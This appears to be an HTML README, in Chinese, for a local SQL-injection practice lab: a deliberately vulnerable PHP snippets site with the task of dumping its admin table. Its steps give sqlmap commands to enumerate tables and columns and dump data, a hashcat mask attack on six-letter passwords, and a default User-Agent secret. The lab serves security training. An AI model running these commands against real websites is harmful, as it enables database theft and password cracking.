<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8" />
    <title>PHP Code Snippets Website</title>
    <style>
    .markdown-preview {
        font-family: Consolas, 'Microsoft YaHei', 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif;
        line-height: 1.6;
        overflow: auto;
        box-sizing: border-box;
        padding: 20px;
        word-wrap: break-word;
        width: 1000px;
        margin: 0 auto;
    }
    
    .markdown-preview >:first-child {
        margin-top: 0!important;
    }
    
    .markdown-preview >:last-child {
        margin-bottom: 0!important;
    }
    
    .markdown-preview h1,
    .markdown-preview h3 {
        font-weight: 700;
        position: relative;
        margin-top: 1em;
        margin-bottom: 16px;
        cursor: text;
        -webkit-font-smoothing: antialiased;
    }
    
    .markdown-preview h1 {
        font-size: 2.25em;
        line-height: 1.2;
        padding-bottom: .3em;
        border-bottom-width: 1px;
        border-bottom-style: solid;
    }
    
    .markdown-preview h3 {
        font-size: 1.5em;
        line-height: 1.43;
    }
    
    .markdown-preview ul {
        margin-top: 0;
        margin-bottom: 16px;
        padding-left: 2em;
    }
    
    .markdown-preview code {
        font-size: 85%;
        margin: 0;
        margin-right: 3px;
        margin-left: 3px;
        padding: .2em 0;
        border-radius: 3px;
    }
    
    .markdown-preview code::after,
    .markdown-preview code::before {
        content: ' ';
        letter-spacing: -.2em;
    }
    
    .markdown-preview > h1:first-child {
        margin-top: 0;
        padding-top: 0;
    }
    
    .markdown-preview ul li >:first-child {
        margin-top: 0;
    }
    
    .markdown-preview ul > li {
        list-style-type: disc;
    }
    
    .markdown-preview {
        font-size: 1.25em;
        color: #c8ccd5;
        background-color: #2f333d;
    }
    
    .markdown-preview h1 {
        color: inherit;
        border-color: #181a1f;
    }
    
    .markdown-preview code {
        font-family: Consolas, 'Liberation Mono', Courier, monospace;
        color: #f3f4f6;
        border-color: #181a1f;
        background-color: #3e4451;
        background-clip: padding-box;
    }
    
    .markdown-preview pre.editor-colors::shadow .line.cursor-line {
        background-color: transparent;
    }
    </style>
</head>

<body class='markdown-preview'>
    <h1 id="codeshare">PHP Code Snippets Website</h1>
    <h3 id="intro">Intro</h3>
    <ul>
        <li>PHP 运行环境采用<code>PHP5.4 x86</code>，如果想更换PHP请更换对应PHP的<code>DLL</code>和<code>EXE</code>。</li>
        <li>双击<code>start.bat</code>，运行网站，打开<code>http://127.0.0.1:3000</code>即可。</li>
        <li>请用现代浏览器，强烈建议不要用IE8及以下，因为网站页面显示会乱。</li>
        <li>网站内存在一个漏洞，可以尝试手动注入或采用<code>sqlmap</code>进行注入，目前明小子啊D并不支持此漏洞。</li>
    </ul>
    <h3 id="task">Task</h3>
    <ul>
        <li>破解后请将数据库中admin表的内容获取到。</li>
        <li>并将数据库中管理员密码破解出来,管理员的密码可能是六位的字母。</li>
    </ul>
    <h3 id="step">Step</h3>
    <ul>
        <li>获取到有漏洞的URL。</li>
        <li>列出目标网站的有数据库：<code>python sqlmap.py -u "url" --tables</code>。</li>
        <li>列出目标数据库的所有列名：<code>python sqlmap.py -u "url" -T table --columns</code>。</li>
        <li>列出目标列下的所有内容<code>python sqlmap.py -u "url" -T table column1,column2,column3 --dump</code>。</li>
        <li>然后用<code>hashcat</code>破解hash值：<code>hashcat -a 3 -o plain.txt hash.txt ?l?l?l?l?l?l</code>。</li>
    </ul>
    <h3 id="extra">Extra</h3>
    <ul>
        <li>如果想在代码库里边添加代码，请更换浏览器的<code>UserAgent</code>为<code>www/action/config.php</code>中<code>UACHECK</code>的值（默认：123456）。</li>
    </ul>
</body>

</html>
